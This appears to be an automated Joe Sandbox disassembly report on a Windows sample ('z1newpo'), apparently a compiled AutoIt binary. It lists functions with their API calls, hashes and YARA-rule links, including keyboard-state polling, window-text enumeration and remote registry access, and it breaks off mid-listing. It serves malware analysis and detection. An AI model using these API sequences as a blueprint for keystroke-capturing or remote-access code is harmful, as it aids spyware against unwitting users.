                                                    • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                    • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                    • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                    Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                    • LoadStringW.USER32(00000000), ref: 00454040
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • _wprintf.LIBCMT ref: 00454074
                                                    • __swprintf.LIBCMT ref: 004540A3
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                    • API String ID: 455036304-4153970271
                                                    • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                    • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                    • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                    • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                    Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                    • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                    • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                    • _memmove.LIBCMT ref: 00467EB8
                                                    • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                    • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                    • _memmove.LIBCMT ref: 00467F6C
                                                    • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                    • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                    • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                    • String ID:
                                                    • API String ID: 2170234536-0
                                                    • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                    • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                    • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                    • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                    Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 00453CE0
                                                    • SetKeyboardState.USER32(?), ref: 00453D3B
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                    • GetKeyState.USER32(000000A0), ref: 00453D75
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                    • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                    • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                    • GetKeyState.USER32(00000011), ref: 00453DEF
                                                    • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                    • GetKeyState.USER32(00000012), ref: 00453E26
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                    • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                    • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                    • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                    • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                    Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                    • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                    • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                    • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                    • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                    • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                    • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                    • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                    • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                    • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                    • String ID:
                                                    • API String ID: 3096461208-0
                                                    • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                    • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                    • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                    • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                    Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                    • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                    • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                    • DeleteObject.GDI32(?), ref: 0047151E
                                                    • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                    • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                    • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                    • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                    • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                    • DeleteObject.GDI32(?), ref: 004715EA
                                                    • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                    • String ID:
                                                    • API String ID: 3218148540-0
                                                    • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                    • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                    • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                    • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                    Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                    • String ID:
                                                    • API String ID: 136442275-0
                                                    • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                    • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                    • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                    • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                    Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _wcsncpy.LIBCMT ref: 00467490
                                                    • _wcsncpy.LIBCMT ref: 004674BC
                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                    • _wcstok.LIBCMT ref: 004674FF
                                                      • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                    • _wcstok.LIBCMT ref: 004675B2
                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                    • _wcslen.LIBCMT ref: 00467793
                                                    • _wcscpy.LIBCMT ref: 00467641
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    • _wcslen.LIBCMT ref: 004677BD
                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                      • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                    • String ID: X
                                                    • API String ID: 3104067586-3081909835
                                                    • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                    • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                    • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                    • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                    Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                    • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                    • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                    • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                    • _wcslen.LIBCMT ref: 0046CDB0
                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                    • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                    • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                      • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                      • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                      • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                    Strings
                                                    • NULL Pointer assignment, xrefs: 0046CEA6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                    • String ID: NULL Pointer assignment
                                                    • API String ID: 440038798-2785691316
                                                    • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                    • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                    • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                    • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                    Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                    • _wcslen.LIBCMT ref: 004610A3
                                                    • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                    • GetWindowRect.USER32(?,?), ref: 00461248
                                                      • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                    • String ID: ThumbnailClass
                                                    • API String ID: 4136854206-1241985126
                                                    • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                    • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                    • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                    • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                    Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                    • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                    • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                    • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                    • GetClientRect.USER32(?,?), ref: 00471A1A
                                                    • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                    • DestroyIcon.USER32(?), ref: 00471AF4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                    • String ID: 2
                                                    • API String ID: 1331449709-450215437
                                                    • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                    • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                    • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                    • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                    Function 0046081F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                    • __swprintf.LIBCMT ref: 00460915
                                                    • __swprintf.LIBCMT ref: 0046092D
                                                    • _wprintf.LIBCMT ref: 004609E1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                    • API String ID: 3054410614-2561132961
                                                    • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                    • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                    • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                    • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                    Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
